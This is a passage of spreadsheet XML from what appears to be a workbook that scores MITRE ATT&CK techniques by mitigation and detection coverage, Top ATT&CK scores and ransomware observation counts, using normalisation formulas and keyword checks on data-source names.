      <c r="AH24" s="25" t="str" cm="1">
        <f t="array" ref="AH24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC24)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI24" s="25">
        <f>IF(AH24="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ24" s="25" t="str" cm="1">
        <f t="array" ref="AJ24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC24)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK24" s="25">
        <f>IF(AJ24="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL24" s="25" t="str" cm="1">
        <f t="array" ref="AL24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC24)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM24" s="25">
        <f>IF(AL24="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN24" s="52">
        <v>7</v>
      </c>
      <c r="AO24" s="51">
        <v>1</v>
      </c>
      <c r="AP24" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.29521039047619047</v>
      </c>
      <c r="AQ24" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20625685714285713</v>
      </c>
      <c r="AR24" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20625685714285713</v>
      </c>
      <c r="AS24" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT24" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU2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5" spans="1:47" ht="32.1">
      <c r="A25" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14693880121333333</v>
      </c>
      <c r="B25" s="25">
        <f>SUM(H25,M25,V25)*(1+SUM(AE25,AG25,AI25,AK25,AM25))</f>
        <v>0.80272134546666674</v>
      </c>
      <c r="C25" s="25" t="s">
        <v>186</v>
      </c>
      <c r="D25" s="25" t="s">
        <v>187</v>
      </c>
      <c r="E25" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F25" s="51">
        <v>1</v>
      </c>
      <c r="G25" s="51">
        <v>1</v>
      </c>
      <c r="H25" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I25">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J25">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K25">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L25">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M25" s="44">
        <v>0.37974036</v>
      </c>
      <c r="N25" s="51">
        <v>0</v>
      </c>
      <c r="O25" s="51">
        <v>2</v>
      </c>
      <c r="P25" s="51">
        <v>2</v>
      </c>
      <c r="Q25" s="51">
        <v>0</v>
      </c>
      <c r="R25" s="52" t="s">
        <v>188</v>
      </c>
      <c r="S25" s="51">
        <v>6</v>
      </c>
      <c r="T25" s="52" t="s">
        <v>189</v>
      </c>
      <c r="U25" s="51">
        <v>5</v>
      </c>
      <c r="V25" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12380952380952383</v>
      </c>
      <c r="W25">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X25">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y25">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z25">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA25">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB25">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC25" s="29" t="s">
        <v>190</v>
      </c>
      <c r="AD25" s="25" t="str" cm="1">
        <f t="array" ref="AD25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC25)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE25" s="25">
        <f>IF(AD25="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF25" s="25" t="str" cm="1">
        <f t="array" ref="AF25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC25)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG25" s="25">
        <f>IF(AF25="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH25" s="25" t="str" cm="1">
        <f t="array" ref="AH25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC25)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI25" s="25">
        <f>IF(AH25="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ25" s="25" t="str" cm="1">
        <f t="array" ref="AJ25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC25)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK25" s="25">
        <f>IF(AJ25="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL25" s="25" t="str" cm="1">
        <f t="array" ref="AL25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC25)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM25" s="25">
        <f>IF(AL25="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN25" s="52">
        <v>2</v>
      </c>
      <c r="AO25" s="51">
        <v>1</v>
      </c>
      <c r="AP25" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14693880121333333</v>
      </c>
      <c r="AQ25" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.26757378182222225</v>
      </c>
      <c r="AR25" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.26757378182222225</v>
      </c>
      <c r="AS25" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT25" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU2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6" spans="1:47">
      <c r="A26" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.25440291609523813</v>
      </c>
      <c r="B26" s="25">
        <f>SUM(H26,M26,V26)*(1+SUM(AE26,AG26,AI26,AK26,AM26))</f>
        <v>0.54402916095238096</v>
      </c>
      <c r="C26" s="25" t="s">
        <v>191</v>
      </c>
      <c r="D26" s="25" t="s">
        <v>192</v>
      </c>
      <c r="E26" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F26" s="51">
        <v>1</v>
      </c>
      <c r="G26" s="51">
        <v>1</v>
      </c>
      <c r="H26" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I26">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J26">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K26">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L26">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M26" s="44">
        <v>0.36307677999999999</v>
      </c>
      <c r="N26" s="51">
        <v>1</v>
      </c>
      <c r="O26" s="51">
        <v>9</v>
      </c>
      <c r="P26" s="51">
        <v>5</v>
      </c>
      <c r="Q26" s="51">
        <v>2</v>
      </c>
      <c r="R26" s="51"/>
      <c r="S26" s="51">
        <v>0</v>
      </c>
      <c r="T26" s="51"/>
      <c r="U26" s="51">
        <v>0</v>
      </c>
      <c r="V26" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.0952380952380956E-2</v>
      </c>
      <c r="W26">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X26">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y26">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z26">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>17</v>
      </c>
      <c r="AA26">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.17</v>
      </c>
      <c r="AB26">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.17</v>
      </c>
      <c r="AC26" s="29"/>
      <c r="AD26" s="25" t="str" cm="1">
        <f t="array" ref="AD26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE26" s="25">
        <f>IF(AD26="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF26" s="25" t="str" cm="1">
        <f t="array" ref="AF26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG26" s="25">
        <f>IF(AF26="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH26" s="25" t="str" cm="1">
        <f t="array" ref="AH26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI26" s="25">
        <f>IF(AH26="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ26" s="25" t="str" cm="1">
        <f t="array" ref="AJ26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK26" s="25">
        <f>IF(AJ26="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL26" s="25" t="str" cm="1">
        <f t="array" ref="AL26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM26" s="25">
        <f>IF(AL26="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN26" s="52">
        <v>6</v>
      </c>
      <c r="AO26" s="51">
        <v>1</v>
      </c>
      <c r="AP26" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.25440291609523813</v>
      </c>
      <c r="AQ26" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18134305365079365</v>
      </c>
      <c r="AR26" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18134305365079365</v>
      </c>
      <c r="AS26" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT26" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU2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7" spans="1:47" ht="63.95">
      <c r="A27" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.19093014043333334</v>
      </c>
      <c r="B27" s="25">
        <f>SUM(H27,M27,V27)*(1+SUM(AE27,AG27,AI27,AK27,AM27))</f>
        <v>0.57596807100000003</v>
      </c>
      <c r="C27" s="25" t="s">
        <v>193</v>
      </c>
      <c r="D27" s="25" t="s">
        <v>194</v>
      </c>
      <c r="E27" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F27" s="51">
        <v>1</v>
      </c>
      <c r="G27" s="51">
        <v>1</v>
      </c>
      <c r="H27" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I27">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J27">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K27">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L27">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M27" s="44">
        <v>0.33305869999999999</v>
      </c>
      <c r="N27" s="51">
        <v>0</v>
      </c>
      <c r="O27" s="51">
        <v>0</v>
      </c>
      <c r="P27" s="51">
        <v>0</v>
      </c>
      <c r="Q27" s="51">
        <v>0</v>
      </c>
      <c r="R27" s="51"/>
      <c r="S27" s="51">
        <v>0</v>
      </c>
      <c r="T27" s="51"/>
      <c r="U27" s="51">
        <v>0</v>
      </c>
      <c r="V27" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W27">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X27">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y27">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z27">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA27">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB27">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC27" s="29" t="s">
        <v>195</v>
      </c>
      <c r="AD27" s="25" t="str" cm="1">
        <f t="array" ref="AD27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC27)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE27" s="25">
        <f>IF(AD27="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF27" s="25" t="str" cm="1">
        <f t="array" ref="AF27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC27)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG27" s="25">
        <f>IF(AF27="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH27" s="25" t="str" cm="1">
        <f t="array" ref="AH27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC27)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI27" s="25">
        <f>IF(AH27="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ27" s="25" t="str" cm="1">
        <f t="array" ref="AJ27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC27)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK27" s="25">
        <f>IF(AJ27="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL27" s="25" t="str" cm="1">
        <f t="array" ref="AL27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC27)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM27" s="25">
        <f>IF(AL27="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN27" s="52">
        <v>4</v>
      </c>
      <c r="AO27" s="51">
        <v>1</v>
      </c>
      <c r="AP27" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.19093014043333334</v>
      </c>
      <c r="AQ27" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.191989357</v>
      </c>
      <c r="AR27" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.191989357</v>
      </c>
      <c r="AS27" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT27" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU2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8" spans="1:47" ht="96">
      <c r="A28" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.35962408994333334</v>
      </c>
      <c r="B28" s="25">
        <f>SUM(H28,M28,V28)*(1+SUM(AE28,AG28,AI28,AK28,AM28))</f>
        <v>1.9295742327666667</v>
      </c>
      <c r="C28" s="25" t="s">
        <v>196</v>
      </c>
      <c r="D28" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E28" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F28" s="51">
        <v>1</v>
      </c>
      <c r="G28" s="51">
        <v>5</v>
      </c>
      <c r="H28" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="I28">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J28">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K28">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L28">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M28" s="44">
        <v>0.32699816999999998</v>
      </c>
      <c r="N28" s="51">
        <v>0</v>
      </c>
      <c r="O28" s="51">
        <v>64</v>
      </c>
      <c r="P28" s="51">
        <v>13</v>
      </c>
      <c r="Q28" s="51">
        <v>14</v>
      </c>
      <c r="R28" s="51" t="s">
        <v>198</v>
      </c>
      <c r="S28" s="51">
        <v>19</v>
      </c>
      <c r="T28" s="51" t="s">
        <v>199</v>
      </c>
      <c r="U28" s="51">
        <v>22</v>
      </c>
      <c r="V28" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.82380952380952388</v>
      </c>
      <c r="W28">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>41</v>
      </c>
      <c r="X28">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.74545454545454548</v>
      </c>
      <c r="Y28">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.74545454545454548</v>
      </c>
      <c r="Z28">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>91</v>
      </c>
      <c r="AA28">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.91</v>
      </c>
      <c r="AB28">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.91</v>
      </c>
      <c r="AC28" s="29" t="s">
        <v>200</v>
      </c>
      <c r="AD28" s="25" t="str" cm="1">
        <f t="array" ref="AD28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC28)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE28" s="25">
        <f>IF(AD28="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF28" s="25" t="str" cm="1">
        <f t="array" ref="AF28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC28)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG28" s="25">
        <f>IF(AF28="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH28" s="25" t="str" cm="1">
        <f t="array" ref="AH28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC28)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI28" s="25">
        <f>IF(AH28="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ28" s="25" t="str" cm="1">
        <f t="array" ref="AJ28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC28)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK28" s="25">
        <f>IF(AJ28="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL28" s="25" t="str" cm="1">
        <f t="array" ref="AL28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC28)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM28" s="25">
        <f>IF(AL28="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN28" s="61">
        <v>5</v>
      </c>
      <c r="AO28" s="51">
        <v>1</v>
      </c>
      <c r="AP28" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.35962408994333334</v>
      </c>
      <c r="AQ28" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.64319141092222221</v>
      </c>
      <c r="AR28" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.64319141092222221</v>
      </c>
      <c r="AS28" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT28" s="25">
